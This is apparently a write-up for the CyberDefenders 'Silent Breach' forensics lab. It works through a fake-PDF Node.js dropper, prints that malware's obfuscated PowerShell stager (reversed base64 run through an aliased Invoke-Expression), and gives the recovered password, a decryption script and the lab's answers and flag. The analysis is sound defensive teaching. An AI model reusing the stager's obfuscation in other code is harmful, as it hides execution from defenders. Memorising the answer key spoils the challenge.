Lab: https://cyberdefenders.org/blueteam-ctf-challenges/silent-breach/
1. What is the MD5 hash of the potentially malicious EXE file the user downloaded?
Navigating to the Downloads folder we can see right away a suspicious executable which attempts to camouflage itself as a PDF.
Get-FileHash -Algorithm md5 .\IMF-Info.pdf.exe
Answer: 336A7CF476EBC7548C93507339196ABB
2. What is the URL from which the file was downloaded?
Since it has the Zone.Identifier metadata, the MOTW was applied to the file, so there is a high chance it was downloaded via a browser.
According to Microsoft (https://learn.microsoft.com/en-us/dotnet/api/system.security.securityzone?view=windowsdesktop-10.0) we also know from "ZoneId=3" that the file was downloaded from the internet.
Answer: http://192.168.16.128:8000/IMF-Info.pdf.exe
3. What application did the user use to download this file?
Based on the previous findings we will check the History file of the installed browsers:
Exported the History file from the Edge browser.
Opened the file in SQLite and browsed the "downloads" table.
In total 5 files were downloaded from the suspicious URL, which matches the suspicious filename found earlier.
Answer: Microsoft Edge
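The two artifacts used in questions 2 and 3 can be tied together programmatically. The Python below is an added example, not part of the original write-up: it parses a Zone.Identifier stream (the SecurityZone mapping is the enum linked above; the ADS text and the in-memory History database with only the downloads / downloads_url_chains columns used here are constructed samples, not the lab's real data) and lists the downloads whose URL chain points at the host recorded in the Mark-of-the-Web.

```python
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit

# SecurityZone values from the enum the page links to; 3 is the Internet zone.
ZONE_NAMES = {0: "MyComputer", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Untrusted"}
# Constructed sample of a Zone.Identifier ADS (only ZoneId=3 comes from the page).
SAMPLE_ADS = "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=http://192.168.16.128:8000/IMF-Info.pdf.exe\r\n"

def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style Zone.Identifier stream that carries the Mark-of-the-Web."""
    info = {}
    for line in text.splitlines():
        if "=" in line and not line.startswith("["):
            key, _, value = line.partition("=")
            info[key.strip()] = value.strip()
    info["ZoneName"] = ZONE_NAMES.get(int(info.get("ZoneId", -1)), "Unknown")
    return info

def build_sample_history() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Edge History DB, limited to the columns used here."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE downloads (id INTEGER PRIMARY KEY, target_path TEXT, start_time INTEGER);"
        "CREATE TABLE downloads_url_chains (id INTEGER, chain_index INTEGER, url TEXT);"
    )
    db.executemany("INSERT INTO downloads VALUES (?, ?, ?)", [
        (1, r"C:\Users\user\Downloads\IMF-Info.pdf.exe", 13390000000000000),
        (2, r"C:\Users\user\Downloads\report.pdf", 13390000600000000),
    ])
    db.executemany("INSERT INTO downloads_url_chains VALUES (?, ?, ?)", [
        (1, 0, "http://192.168.16.128:8000/IMF-Info.pdf.exe"),
        (2, 0, "https://example.com/report.pdf"),
    ])
    return db

def downloads_from_host(db: sqlite3.Connection, host: str) -> list:
    """Return (target_path, url, start_time_iso) for every download whose URL chain hits host."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)  # WebKit time: microseconds since 1601
    rows = db.execute("SELECT d.target_path, c.url, d.start_time FROM downloads d "
                      "JOIN downloads_url_chains c ON c.id = d.id ORDER BY d.start_time")
    hits = [(target, url, (epoch + timedelta(microseconds=start)).isoformat())
            for target, url, start in rows if urlsplit(url).hostname == host]
    return hits

def downloads_matching_ads(ads_text: str, db: sqlite3.Connection) -> list:
    host = urlsplit(parse_zone_identifier(ads_text)["HostUrl"]).hostname
    return downloads_from_host(db, host)
```

Against a real History copy, replace build_sample_history() with sqlite3.connect() on the exported file; the downloads table has many more columns, but the join on id is the same.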
4. By examining Windows Mail artifacts, we found an email address mentioning three IP addresses of servers that are at risk or compromised. What are the IP addresses?
Checking the artifact "HxStore.hxd", which can be found under "%LOCALAPPDATA%\Packages\Microsoft.windowscommunicationsapps_...\LocalState", we can retrieve additional information from the Windows Mail app.
strings.exe .\HxStore.hxd | Select-String -Pattern '\b(?:\d{1,3}\.){3}\d{1,3}\b' | Sort-Object -Uniq
Answer: 192.168.16.128, 212.33.10.112, 145.67.29.88
5. By examining the malicious executable, we found that it uses an obfuscated PowerShell script to decrypt specific files. What predefined password does the script use for encryption?
Starting with some static analysis in DiE we can identify the packer and the language used.
This malware was written in Node.js and then packed as a PE so it runs without Node.js being installed. A bit of research points to the repository vercel/pkg, which takes JavaScript (Node.js) code, compiles it into V8 bytecode and wraps it into an executable.
After searching for available unpackers we can find the following repo: https://github.com/LockBlock-dev/pkg-unpacker.
npm start -- -i ./pkg_app.exe -o ./unpacked
Now we can run strings against it without getting much rubbish.
strings.exe .\main.js
Saving the output to a file and cleaning the rubbish we get the following code:
# stage 1: the real script is stored as a base64 string written backwards
$wy7qIGPnm36HpvjrL2TMUaRbz = "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" ;
# stage 2: reverse it character by character (the -join result is thrown away; the reversed char array is what gets used next)
$9U5RgiwHSYtbsoLuD3Vf6 = $wy7qIGPnm36HpvjrL2TMUaRbz.ToCharArray() ; [array]::Reverse($9U5RgiwHSYtbsoLuD3Vf6) ; -join $9U5RgiwHSYtbsoLuD3Vf6 2>&1> $null ;
# stage 3: base64-decode the reversed string into the plain PowerShell script
$FHG7xpKlVqaDNgu1c2Utw = [systeM.tEXT.ENCODIng]::uTf8.geTStRInG([sYsTeM.CoNVeRt]::FROMBase64StRIng("$9U5RgiwHSYtbsoLuD3Vf6")) ;
# stage 4: assemble "Invoke-Expression" from fragments, hide it behind the alias PwN and run the decoded script
$9ozWfHXdm8eIBYru = "InV"+"okE"+"-ex"+"prE"+"SsI"+"ON";
new-aliaS -Name PwN -ValUe $9ozWfHXdm8eIBYru -fOrce;
pwn $FHG7xpKlVqaDNgu1c2Utw;
To analyse the script I will use PowerShell ISE and set a breakpoint on the last line, since that is the one that actually executes the de-obfuscated code.
Answer: Imf!nfo#2025Sec$
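The same unwrapping can be done statically, without ever running the stager. The Python below is an added example, not part of the original write-up or of the malware: it applies the stager's own transform in reverse (reverse the literal, base64-decode as UTF-8), collapses the "a"+"b"+"c" string concatenation that hides Invoke-Expression, and lists the alias the script registers. SAMPLE_STAGER is a constructed copy of the stager structure with a harmless payload; the page's real base64 blob is not reproduced.

```python
import base64
import re

# Constructed harmless stand-in for the real payload; the page's base64 blob is not reproduced.
INNER_SCRIPT = "Write-Output 'decoded payload'"
_REVERSED_B64 = base64.b64encode(INNER_SCRIPT.encode("utf-8")).decode()[::-1]
SAMPLE_STAGER = (
    f'$a = "{_REVERSED_B64}" ;\n'
    "$b = $a.ToCharArray() ; [array]::Reverse($b) ; -join $b 2>&1> $null ;\n"
    '$c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("$b")) ;\n'
    '$d = "InV"+"okE"+"-ex"+"prE"+"SsI"+"ON";\n'
    "new-aliaS -Name PwN -ValUe $d -fOrce;\n"
    "pwn $c;\n"
)

def join_fragments(text: str) -> str:
    """Collapse "a"+"b"+"c" concatenations so split cmdlet names become readable."""
    pattern = re.compile(r'"[^"]*"(?:\s*\+\s*"[^"]*")+')
    return pattern.sub(lambda m: '"' + "".join(re.findall(r'"([^"]*)"', m.group(0))) + '"', text)

def unwrap_reversed_base64(blob: str) -> str:
    """Undo the stager's transform: the literal is stored reversed, then base64-decoded as UTF-8."""
    return base64.b64decode(blob[::-1]).decode("utf-8")

def deobfuscate(stager: str) -> dict:
    """Static unwrap of the stager: recover the payload and flag the hidden Invoke-Expression."""
    m = re.search(r'=\s*"([A-Za-z0-9+/=]+)"\s*;', stager)  # the big base64-looking literal
    payload = unwrap_reversed_base64(m.group(1)) if m else ""
    cleaned = join_fragments(stager)
    aliases = re.findall(r"(?i)new-alias\s+-name\s+(\S+)", cleaned)
    return {
        "payload": payload,
        "cleaned": cleaned,
        "aliases": aliases,
        "invokes_iex": "invoke-expression" in cleaned.lower(),
    }
```

The recovered payload is what the breakpoint on the last line would hand to Invoke-Expression; here it can be saved and read without executing anything.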
6. After identifying how the script works, decrypt the files and submit the secret string.
Before analysing it, let's save the de-obfuscated code into main2.ps1 for better readability.
echo $FHG7xpKlVqaDNgu1c2Utw > main2.ps1
Looking back at the PS code we find two new artifacts, IMF-Secret.pdf and IMF-Mission.pdf, which the code encrypts using the AES algorithm.
Going to FTK Imager we can find those files; let's extract them so we can decrypt them.
To decrypt the files I read the following documentation: https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-10.0.
Just adjusting the code to point to our paths and replacing the CreateEncryptor() call with CreateDecryptor() did the trick. Here is the code that I used with my modifications:
$password = "Imf!nfo#2025Sec$"
$salt = [Byte[]](0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08)
$iterations = 10000
$keySize = 32
$ivSize = 16
# PBKDF2: key and IV are read in this order from the same derived-bytes stream
$deriveBytes = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($password, $salt, $iterations)
$key = $deriveBytes.GetBytes($keySize)
$iv = $deriveBytes.GetBytes($ivSize)
# List of input files
$inputFiles = @(
    "C:\Users\Rev\Desktop\Silent_Breach\IMF-Secret.enc",  # POINT TO MY PATH
    "C:\Users\Rev\Desktop\Silent_Breach\IMF-Mission.enc"  # POINT TO MY PATH
)
foreach ($inputFile in $inputFiles) {
    #$outputFile = $inputFile -replace '\.pdf$', '.enc'
    $outputFile = $inputFile -replace '\.enc$', '.pdf'  # SWITCH THE LOGIC, I HAVE THE ENC FILES
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key = $key
    $aes.IV = $iv
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    #$encryptor = $aes.CreateEncryptor()
    $decryptor = $aes.CreateDecryptor()  # CreateDecryptor() is the function that we need
    $cipherBytes = [System.IO.File]::ReadAllBytes($inputFile)
    $outStream = New-Object System.IO.FileStream($outputFile, [System.IO.FileMode]::Create)
    $cryptoStream = New-Object System.Security.Cryptography.CryptoStream($outStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
    $cryptoStream.Write($cipherBytes, 0, $cipherBytes.Length)
    $cryptoStream.FlushFinalBlock()
    $cryptoStream.Close()
    $outStream.Close()
    Remove-Item $inputFile -Force  # carried over from the original script: deletes the .enc file once the .pdf is written
}
Answer: CyberDefenders{N3v3r_eX3cuTe_F!l3$dOwnL0ded_fr0m_M@lic10u5$erV3r}
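For a cross-check outside PowerShell, the Python below is an added example, not the author's script: it reproduces the key derivation the script relies on (Rfc2898DeriveBytes with the three-argument constructor is PBKDF2-HMAC-SHA1 over the UTF-8 password, and the two GetBytes calls read one continuous stream, so a single 48-byte derivation split at offset 32 yields the same key and IV) and then performs the AES-256-CBC/PKCS7 decryption. The AES step assumes the third-party cryptography package; the derivation needs only the standard library.

```python
import hashlib

try:  # AES is not in the standard library; the derivation below needs only hashlib.
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from cryptography.hazmat.primitives import padding
    HAVE_CRYPTOGRAPHY = True
except ImportError:
    HAVE_CRYPTOGRAPHY = False

# Parameters recovered from the de-obfuscated script (same values as the PowerShell above).
PASSWORD = "Imf!nfo#2025Sec$"
SALT = bytes([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08])
ITERATIONS = 10000
KEY_SIZE, IV_SIZE = 32, 16

def derive_key_iv(password: str, salt: bytes, iterations: int):
    """Mirror Rfc2898DeriveBytes(password, salt, iterations): PBKDF2-HMAC-SHA1 over the
    UTF-8 password. GetBytes(32) followed by GetBytes(16) consumes one continuous PBKDF2
    stream, so deriving 48 bytes once and splitting at 32 gives the identical key and IV."""
    stream = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt, iterations,
                                 KEY_SIZE + IV_SIZE)
    return stream[:KEY_SIZE], stream[KEY_SIZE:]

def aes_cbc_decrypt(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-256-CBC with PKCS7 unpadding, the mode and padding the script configured."""
    if not HAVE_CRYPTOGRAPHY:
        raise RuntimeError("install the 'cryptography' package to run the AES step")
    decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = decryptor.update(ciphertext) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()

def decrypt_file(enc_path: str, out_path: str) -> int:
    """Decrypt one .enc file to out_path and return the plaintext length (the .enc is kept)."""
    key, iv = derive_key_iv(PASSWORD, SALT, ITERATIONS)
    with open(enc_path, "rb") as f:
        plain = aes_cbc_decrypt(f.read(), key, iv)
    with open(out_path, "wb") as f:
        f.write(plain)
    return len(plain)
```

A wrong password or salt shows up as a padding error in unpadder.finalize() rather than as garbage output, which is a quick sanity check when trying candidate keys.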